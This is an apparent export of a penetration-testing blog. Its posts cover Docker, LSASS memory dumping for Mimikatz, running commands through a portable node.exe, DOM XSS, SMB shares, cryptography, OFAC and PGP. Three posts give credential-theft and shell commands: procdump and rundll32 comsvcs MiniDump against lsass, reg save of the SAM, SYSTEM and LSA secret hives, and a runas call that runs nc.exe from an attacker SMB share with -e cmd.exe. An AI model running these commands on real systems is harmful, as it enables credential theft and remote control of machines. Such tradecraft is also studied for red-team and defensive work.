tag:blogger.com,1999:blog-67676550429689729482024-03-23T03:13:54.100-07:00Penetration testing bY eXpl0i13rAnonymoushttp://www.blogger.com/profile/17976787515274046885noreply@blogger.comBlogger80125tag:blogger.com,1999:blog-6767655042968972948.post-84807089159908155732020-04-18T05:09:00.002-07:002020-04-18T05:12:06.762-07:00Dockers and Containers<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
For years, developer had a challenge setting up development environment with the right configurations of tools as well as time required for the same.<br />
<br />
This becomes even more complex when developer is using diverse technology stack. Consider a scenario where developer has written code in Python to accept the web requests using Mongo DB as back-end and further using analytics application to generate report.<br />
<br />
Now as you can see diverse technology stack comes into picture here, is it easy task to setup all these stacks and connect with each others? Not at all. That's where docker technology comes into picture.<br />
<br />
Above problem for installing the required technology tools/stack becomes very handy just with few commands! Rest you rely on the docker to take care of back-end dependencies.<br />
<br />
<br />
<ol style="text-align: left;">
<li>docker run --name=db -d mongo (This will install complete running Mongo DB for you )</li>
<li>docker run --name=db -d MySQL (This will install complete running MySQL DB for you )</li>
<li>docker run --name=db -d nginix (This will install complete running NGINX for you )</li>
</ol>
<div>
Its that easy! Of course we can mention additional configurations by parameters, you can refer respective docker documentation for the same.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzCEDVYRSdgCR0ngn5YHUrwQ1cUNByGzsquYKPVgPcNIre0YYotTBsSVU7vWCaiFdAvDmU9hxt2KIUEuiVQFjgkIHPpiDE3e3x83MkDcxZwjLYEmkF3YOgONMqsHL23XhasH26jVE-E4iw/s1600/dockercontainer_final.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="928" data-original-width="824" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzCEDVYRSdgCR0ngn5YHUrwQ1cUNByGzsquYKPVgPcNIre0YYotTBsSVU7vWCaiFdAvDmU9hxt2KIUEuiVQFjgkIHPpiDE3e3x83MkDcxZwjLYEmkF3YOgONMqsHL23XhasH26jVE-E4iw/s400/dockercontainer_final.png" width="355" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
By Default when container is started, IP address is allocated within the sub net range defined for bridge network.</div>
<div>
<br /></div>
<div>
First we can list the interfaces as mentioned below : </div>
<div>
<br /></div>
<div>
<b>docker network ls</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz4b3MmDjePbveN1zhF2xPx358tcIvLqka5-FJ25aNvYfAg9yJra_lB1pVo8vKn2lA-dRFAeikLeeUUyHNjgJKxoDaK19fINCcfHkQla7sV5-rZvLrAgGdGSTsbqVF9FHd5W9npaeiQizG/s1600/docker+list+network.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="141" data-original-width="690" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz4b3MmDjePbveN1zhF2xPx358tcIvLqka5-FJ25aNvYfAg9yJra_lB1pVo8vKn2lA-dRFAeikLeeUUyHNjgJKxoDaK19fINCcfHkQla7sV5-rZvLrAgGdGSTsbqVF9FHd5W9npaeiQizG/s400/docker+list+network.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
For viewing the details of default IP range configured we can use following command,</div>
<div>
<br /></div>
<div>
<b>docker network inspect bridge</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQ4RwRHkZYoSEzbudJKOS3HB8PAaDLkJX0UDzMfBsR3bD8KmmB-8_bAcrVfX_756KTrViB-kMvNijQB7aBgDl67xxgDCa7HLoQ9hADVwwM87Cg-HyGsIIa-BtSVDPg8WVGuoPdwjTFVYl/s1600/docker+subnet.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="834" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQ4RwRHkZYoSEzbudJKOS3HB8PAaDLkJX0UDzMfBsR3bD8KmmB-8_bAcrVfX_756KTrViB-kMvNijQB7aBgDl67xxgDCa7HLoQ9hADVwwM87Cg-HyGsIIa-BtSVDPg8WVGuoPdwjTFVYl/s400/docker+subnet.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Now we know the default range allocated for container. We can list the IP address of running container by executing following command</div>
<div>
<br /></div>
<div>
<b>docker container inspect --format '{{ .NetworkSettings.IPAddress }}' <container name></b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxResLCN9FGE6ozi9UJR6FCFv3jv8YabklZnf__rnjRIcexsLY4rUJSV1-6kbHBrdav4oWaqiI0iOcKoaV8ZjPtvrEfT-v78DoCOgL9p270Evsdfj_jy3Jhip8bbllxK3Wbj1PRL2wg1Sk/s1600/conatiners+ip.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="1055" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxResLCN9FGE6ozi9UJR6FCFv3jv8YabklZnf__rnjRIcexsLY4rUJSV1-6kbHBrdav4oWaqiI0iOcKoaV8ZjPtvrEfT-v78DoCOgL9p270Evsdfj_jy3Jhip8bbllxK3Wbj1PRL2wg1Sk/s400/conatiners+ip.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
List docker container processes running on system along with their details</div>
<div>
<br /></div>
<div>
<b>docker ps</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCsOmJpE9-9Mqy6YeFmeTHXfJq2uVKZ9K4rB49DuR8LRLs8sgAr74OjS-qCRjEjmyDAy9CcbwXmFqAlQxyXMvKUZ8Pk6_bs5SsmJvUUsfZuCUg890lpHvLLgJo0twGovpt36LmSfY6GFT/s1600/docker+ps.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="226" data-original-width="1600" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCsOmJpE9-9Mqy6YeFmeTHXfJq2uVKZ9K4rB49DuR8LRLs8sgAr74OjS-qCRjEjmyDAy9CcbwXmFqAlQxyXMvKUZ8Pk6_bs5SsmJvUUsfZuCUg890lpHvLLgJo0twGovpt36LmSfY6GFT/s320/docker+ps.JPG" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-84849795089751388162020-04-13T22:25:00.001-07:002020-04-13T22:25:26.670-07:00LSASS Dumping Methods ( For Mimikatz )<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.<br />
<br />
<br />
Here are some of the important methods,<br />
<b><u><br /></u></b>
<b><u>Using ProcDump :</u></b><br />
<b><u><br /></u></b>
1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/pstools">Pstools</a><br />
2. Download ProcDump.exe and upload in on remote system<br />
3. Command : "<b>procdump -ma lsass.exe lsass.dmp"</b><br />
<b><br /></b>
<u><b><br /></b></u>
<u><b>Using VB Script :</b></u><br />
<u><b><br /></b></u>
Download script from here :<br />
<a href="https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp">https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp</a><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8iVGbjRESPNobfH9NyI6BkOusudJ_7eRkaYYPy1sD1tCmpMfP5JmdPg0f0x5gGcolmFXOv_CjYSyEubVjxJ1gPOVxAaJT-Qn-TmWi2El1e_Gtm846YzC6VHX-eXlYU9ykJj54jWYZvLB/s1600/lsass_vbs.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="410" data-original-width="1026" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8iVGbjRESPNobfH9NyI6BkOusudJ_7eRkaYYPy1sD1tCmpMfP5JmdPg0f0x5gGcolmFXOv_CjYSyEubVjxJ1gPOVxAaJT-Qn-TmWi2El1e_Gtm846YzC6VHX-eXlYU9ykJj54jWYZvLB/s400/lsass_vbs.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b><u><b>rundll32 Command :</b></u><br />
<b><u><br /></u></b>
Essentially previous method VBS script is using following command for dumping Lsass.exe process<br />
<br />
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full<br />
<br />
So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4tIN7HNnK-tDdLpnnznhbl3UZrMPU6CFF6DTAiOp6dAL3u_hYK6mcRMADJug0CLG_pIjs7-Ee5WCa3J6lJuH7R7Xo1YTAGt_cixcNJ8JsJaRFkMTuIPP-TxcTgb87M2-HnI2DM0WlOei/s1600/lsass_via+rundll.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="362" data-original-width="622" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4tIN7HNnK-tDdLpnnznhbl3UZrMPU6CFF6DTAiOp6dAL3u_hYK6mcRMADJug0CLG_pIjs7-Ee5WCa3J6lJuH7R7Xo1YTAGt_cixcNJ8JsJaRFkMTuIPP-TxcTgb87M2-HnI2DM0WlOei/s320/lsass_via+rundll.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span id="goog_1689659218"></span><br />
<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-90324276100065075182020-04-01T10:56:00.001-07:002020-04-18T05:12:20.314-07:00Executing Commands via Node.js ( Portable Node.exe )<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Was exploring Node.js and thought to publish article here on how we can leverage Node.js in pentesting.<br />
<br />
I saw few articles of Malware's targeting some of the organizations in USA and UK are using Node.js in their attacks. Seems its really interesting idea to explore how we can leverage this in our Red Teams!<br />
<br />
Quick Introduction on Node.js<br />
<br />
1. Its an open source JavaScript run time environment<br />
2. In a simple words, its a server side JavaScript programming language<br />
3. Node.js gives you access to its API which can control system.<br />
<br />
<br />
Similar to other programming languages, you can Create, Read, Modify files, access OS etc.<br />
<br />
For complete list of API refer - <a href="https://nodejs.org/docs/latest-v13.x/api/">https://nodejs.org/docs/latest-v13.x/api/</a><br />
<br />
<br />
1. Install Node.js on windows<br />
2. Post installation you can access it with 'node' command<br />
3. In Node console we can execute node commands<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheI8HU3ChCCukgYmVWzJ05C4E9l4GomUfvEnZUtK3Bxz6jmRPzmCWZjTosCV2rS2l5htzJcxbpoq568vy7o4-0rC8-LgdKtoK7ohcKWITNs_ZydfD5xY3z1HNEZwyrU4koEhTKos_eLL-Z/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="466" data-original-width="1316" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheI8HU3ChCCukgYmVWzJ05C4E9l4GomUfvEnZUtK3Bxz6jmRPzmCWZjTosCV2rS2l5htzJcxbpoq568vy7o4-0rC8-LgdKtoK7ohcKWITNs_ZydfD5xY3z1HNEZwyrU4koEhTKos_eLL-Z/s400/1.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now for Pen-testers, we don't have to install Node.js on remote system we can always carry portable node.exe file and drop it in remote system. ( I don't have to tell you where to get Node.exe, You can figure out yourself! )<br />
<br />
<br />
Here is the code which we can use for executing OS commands via Node.js API.<br />
<br />
<i>var myArgs = process.argv.slice(2);</i><br />
<i><br /></i>
<i>const { exec } = require("child_process");</i><br />
<i><br /></i>
<i>exec(myArgs, (error, stdout, stderr) => {</i><br />
<i> if (error) {</i><br />
<i> console.log(`error: ${error.message}`);</i><br />
<i> return;</i><br />
<i> }</i><br />
<i> if (stderr) {</i><br />
<i> console.log(`stderr: ${stderr}`);</i><br />
<i> return;</i><br />
<i> }</i><br />
<i><br /></i>
<i> </i><br />
<i> console.log(`stdout: ${stdout}`);</i><br />
<i>});</i><br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8zeaqIVx_mcsYpq9w588BbT4LcjpDKH1S9IPCDwfAMhQK-lnQoOdogSHaL8eDALANcGxdRpBqzs4qnOHDRReWtBDGhPCuZea5jXIV66A0fHlAmXNNpyg392TzZrELTqnCZb5Er6XxFet/s1600/3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="759" data-original-width="685" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8zeaqIVx_mcsYpq9w588BbT4LcjpDKH1S9IPCDwfAMhQK-lnQoOdogSHaL8eDALANcGxdRpBqzs4qnOHDRReWtBDGhPCuZea5jXIV66A0fHlAmXNNpyg392TzZrELTqnCZb5Er6XxFet/s320/3.png" width="288" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Executing OS commands via Node.js</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now we can pass on following important commands as well,<br />
<br />
1. node.exe file.js "reg save HKLM\SAM c:\SAM"<br />
2. node.exe file.js "reg save HKLM\SYSTEM c:\SYSTEM"<br />
3. node.exe file.js "HKEY_LOCAL_MACHINE\Security\Policy\Secrets c:\lsa"<br />
<br />
<br />
This is just one way of executing OS commands via portable Node.exe<br />
<div>
<br /></div>
<div>
Lot more things can be done with this, even a simple Command and control code which will call back your web server and fetch commands or Web server using nodejs which we can use for accessing victim files!<br />
<br />
<br />
There were instances of Malware's codes containing hard coded nodejs links for downloading Node.exe<br />
<a href="https://nodejs.org/dist/latest-v10.x/win-x86/">https://nodejs.org/dist/latest-v10.x/win-x86/</a><br />
<br />
<br />
Here is the good article on Malware's using Node.js :<br />
<a href="https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/">https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/</a><br />
<br />
<br />
<br /></div>
<div>
<br /></div>
</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-82580754091597276262020-04-01T01:24:00.000-07:002020-04-01T01:24:28.170-07:00Document Object Model and DOM XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<b><u><br /></u></b><b><u>DOM (Document Object Model)</u></b><br />
<br />
How many times you saw applications in past where even if you click on some of the buttons or select items from List box and complete page is refreshed. Basically at each such event execution requests is being initiated to server and server responds with complete HTML code to client browser.<br />
<br />
Is not this tedious? Why to load complete HTML page with thousands of tags for each request. Instead what if there is a way where we can only update specific TAG within the HTML code without loading the whole page?<br />
<br />
In this case, we can give control to JavaScript being executed at client browser to change/modify/update data within specific TAG's within HTML. So other TAG and data in the page remains same without any refresh. This will be in a way faster !<br />
<br />
By manipulating the DOM,<br />
1. You can create applications that update the data of the page without needing a refresh.<br />
2. You can create applications that are customizable by the user and then change the layout of the page without a refresh.<br />
<br />
<br />
Key Points in DOM,<br />
1. Page loaded in the application contains thousands of HTML TAGS consider these are all Object.<br />
2. Browser creates the hierarchical view of the TAGS so that JavaScript at client side can actually query specific TAG, extract TAG data, Change/Modify/Update the data within the TAGS as required by application or user.<br />
<br />
<br />
Example :<br />
<br />
Website which loads the flight tickets, you can select the source and destination and click on search, post which request sent to server for retrieving price.<br />
<br />
Once price is retrieved by JavaScript, it can query for specific TAG in the application where price data needs to be updated. Using DOM methods JavaScript can change/update/modify data in specific TAG and now you see the price in front of you!<br />
<br />
<br />
<br />
For key methods in DOM Refer : <a href="https://www.w3schools.com/js/js_htmldom_document.asp">https://www.w3schools.com/js/js_htmldom_document.asp</a><br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3IEktYRX4WgsxXW0odkFo7UkKLACQS7V-_cJ7evStDCLUGTmCb6qXevSZE53f-ClTHfbKc8IWooxUW-7oH1Ke4JgKYY-F8e0dgxTPuhTisybWM5ig_dQIwqOf4nrQuf6FfuVpMhV_GEk/s1600/1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="351" data-original-width="824" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3IEktYRX4WgsxXW0odkFo7UkKLACQS7V-_cJ7evStDCLUGTmCb6qXevSZE53f-ClTHfbKc8IWooxUW-7oH1Ke4JgKYY-F8e0dgxTPuhTisybWM5ig_dQIwqOf4nrQuf6FfuVpMhV_GEk/s320/1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;"><b><i>Querying the Tags using DOM Methods </i></b></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>DOM Based XSS Attack :</u></b><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img alt="Diagram of a DOM-based XSS attack" height="255" src="https://excess-xss.com/dom-based-xss.png" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">Reference : <a href="https://excess-xss.com/">excess-xss.com</a></td></tr>
</tbody></table>
<br />
<b><u><br /></u></b><b><u>Summary :</u></b><br />
1. Attacker Crafts URL with XSS payload<br />
2. Sends the link to Victim<br />
3. Victim executes link<br />
4. Request sent to Server<br />
5. Using DOM method - document.queryselector content from parameter "keyword" are getting updated in the page without appropriate validation.<br />
<br />
Before updating the response using queryselector there should be appropriate validation of the string being passed.<br />
<br />
<br />
<b>References :</b><br />
<br />
<a href="https://hackerone.com/reports/324303">https://hackerone.com/reports/324303</a><br />
<br />
<a href="https://hackerone.com/reports/398054">https://hackerone.com/reports/398054</a><br />
<br />
<a href="https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/">https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/</a><br />
<br />
<a href="https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469">https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469</a><br />
<br />
<a href="https://excess-xss.com/">https://excess-xss.com/</a><br />
<br />
<a href="https://www.w3schools.com/js/js_htmldom_document.asp">https://www.w3schools.com/js/js_htmldom_document.asp</a></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-87939179405753185902019-08-03T02:08:00.000-07:002019-08-03T02:08:09.965-07:00Remote Shares<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<b><u>File Sharing Server on Kali </u></b><br />
<br />
Download SMBServer.py from following link,<br />
<br />
https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py<br />
<br />
Starting SMB Server<br />
<br />
<b><i>python smbserver.py MYSHARE /root/files/</i></b><br />
<b><i><br /></i></b>
<b><i><br /></i></b>
This will be helpful in scenarios where you need to transfer files from on target system from your SMB shares.<br />
<br />
<br />
<br />
<b><u>Execute files directly from remote SMB shares </u></b><br />
<br />
runas /savecred /user:access\Administrator "c:\windows\system32\cmd.exe /c \\10.10.14.8\MYSHARE\nc.exe -nv <IP Address> <Port> -e cmd.exe"<br />
<br />
<br />
<b><u>Mount remote shares via command line </u></b><br />
<br />
net use e: \\IP Address\MYSHARE<br />
<br />
<br /></div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com0tag:blogger.com,1999:blog-6767655042968972948.post-62902663845177986382017-01-28T04:44:00.001-08:002017-01-28T04:47:36.017-08:00Cryptography Mind Map<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Sharing my Crypto Mind Map for quick reference.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj_aMQ7ivirhde8NhiWEM02uZABWL6Mi0sr-ywCvoFBMYwJYzDFmEw1BuAewc6hK18lLGvo5PusOq2gS_OHlWQKS9OY5ihzkWMbci4FPfHM4EKSfTHZwgvU9l80AaLF2QhxutBHy01UCpd/s1600/Crypto_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj_aMQ7ivirhde8NhiWEM02uZABWL6Mi0sr-ywCvoFBMYwJYzDFmEw1BuAewc6hK18lLGvo5PusOq2gS_OHlWQKS9OY5ihzkWMbci4FPfHM4EKSfTHZwgvU9l80AaLF2QhxutBHy01UCpd/s400/Crypto_1.png" width="362" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Download from <a href="https://drive.google.com/open?id=0B4fmHoqW8qjTRUN3VlBnZGU2YnM">here</a><br />
<br />
<br />
Hope this helps!</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com52tag:blogger.com,1999:blog-6767655042968972948.post-26178910751768954252017-01-27T07:55:00.001-08:002017-01-27T07:55:48.699-08:00 Office of Foreign Asset Control (OFAC)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b><u>Office of Foreign Asset Control (OFAC)</u></b><br />
<br />
The Office of Foreign Assets Control (OFAC) is a financial intelligence and enforcement agency of the U.S. Treasury Department.<br />
<br />
Financial institutions uses data/list provided by OFAC <a href="https://www.treasury.gov/resource-center/sanctions/SDN-List/Pages/sdn_data.aspx">here</a><br />
This OFAC is the list of individuals, groups, and entities, such as terrorists and narcotics traffickers designated under programs that are not country-specific - https://www.treasury.gov<br />
<br />
May be helpful !</div>
expl0i13rhttp://www.blogger.com/profile/17058354561465732523noreply@blogger.com1tag:blogger.com,1999:blog-6767655042968972948.post-36968810633712283192017-01-19T10:01:00.000-08:002017-01-19T10:10:33.391-08:00Using PGP for Gmail - (Pretty Good Privacy)<div dir="ltr" style="text-align: left;" trbidi="on">
What is PGP?<br />
<br />
Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication.<br />
<br />
PGP is often used for signing, encrypting, and decrypting texts, e-mails and increase the security of e-mail communications.<br />
<br />
<br />
<br />
Public Key :<br />
This key is public to everyone, you need to share your public keys with your friends, so that your friends will be able to encrypt the message and send it to you.<br />
<br />
Private Key:<br />
This key is private, and you should not share this key with anyone. You will be able to decrypt emails encrypted with your public keys.<br />
<br />
For demonstration we will use - Mailvelope<br />
<br />
Mailvelope is a crome plugin that can be used for generating public key and private key.<br />
and also you will be able to send PGP encrypted / decrypt emails to and from your friends.<br />
<br />
<br />
<a href="https://www.mailvelope.com/en">Link</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBeR7r-1WblQQhydwDdkcnS2dVVjNlqXcoDrYi9oXuIN5lWO4GohG2eHkdZ2cX71B6-ChxA_bZv4UGye6SLwYfFibNrJdQOTL5FUQ8tvxJgqlE_KAODDVvNJhKpVf-al1psE8Gg7ggUX5/s1600/PGP+working.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="303" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBBeR7r-1WblQQhydwDdkcnS2dVVjNlqXcoDrYi9oXuIN5lWO4GohG2eHkdZ2cX71B6-ChxA_bZv4UGye6SLwYfFibNrJdQOTL5FUQ8tvxJgqlE_KAODDVvNJhKpVf-al1psE8Gg7ggUX5/s400/PGP+working.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Steps :</u></b><br />
<br />
1. Generate public and private keys with Mailvelope<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhltPNwngu5-29fmSuEAb9RxDlsVByP9-ANMN8fcJeP9iDogeB9OLn7c__wvdJBtdxsU_fJo2uKk46x1E7sCf6gGMlnPNBHIKXkm9LEvDLWz4fSPqMwvvEk2osPTfdm3_NMd7LZ49pJJkvV/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhltPNwngu5-29fmSuEAb9RxDlsVByP9-ANMN8fcJeP9iDogeB9OLn7c__wvdJBtdxsU_fJo2uKk46x1E7sCf6gGMlnPNBHIKXkm9LEvDLWz4fSPqMwvvEk2osPTfdm3_NMd7LZ49pJJkvV/s400/1.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
2. View your public and private keys<br />
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0fk8eLVnsmTmKbTGpcuJ5DymJJfUp3ccHatgw61ThjA7_TngMnH9FLxIgAoIJdrrGwKUVXPRLh_-Cve6o1C0pgOd-TiBg0aUBRlggCAGzKTGu4wjbiLinDfJ7V6cD9TgysZMHEUG-1Li2/s1600/Display+Keys.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0fk8eLVnsmTmKbTGpcuJ5DymJJfUp3ccHatgw61ThjA7_TngMnH9FLxIgAoIJdrrGwKUVXPRLh_-Cve6o1C0pgOd-TiBg0aUBRlggCAGzKTGu4wjbiLinDfJ7V6cD9TgysZMHEUG-1Li2/s400/Display+Keys.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
3. Now you need to import your friends Public key so that you can encrypt confidential message and send it to him<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnc5CbKN1cVDUOwWz_o3T8SkATYsAFkD51pbE-qAXyZ1uPyUH5dB7XAOjphwDps3wky3jvB1AbIuAdyNOycn_bTJGTjJ72cvnpnmvsaT73J805OGzJfOhej3KRqbgXRMCcu0cJ1eXLGCV/s1600/import.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCnc5CbKN1cVDUOwWz_o3T8SkATYsAFkD51pbE-qAXyZ1uPyUH5dB7XAOjphwDps3wky3jvB1AbIuAdyNOycn_bTJGTjJ72cvnpnmvsaT73J805OGzJfOhej3KRqbgXRMCcu0cJ1eXLGCV/s400/import.PNG" width="400" /></a></div>
<br />
<br />
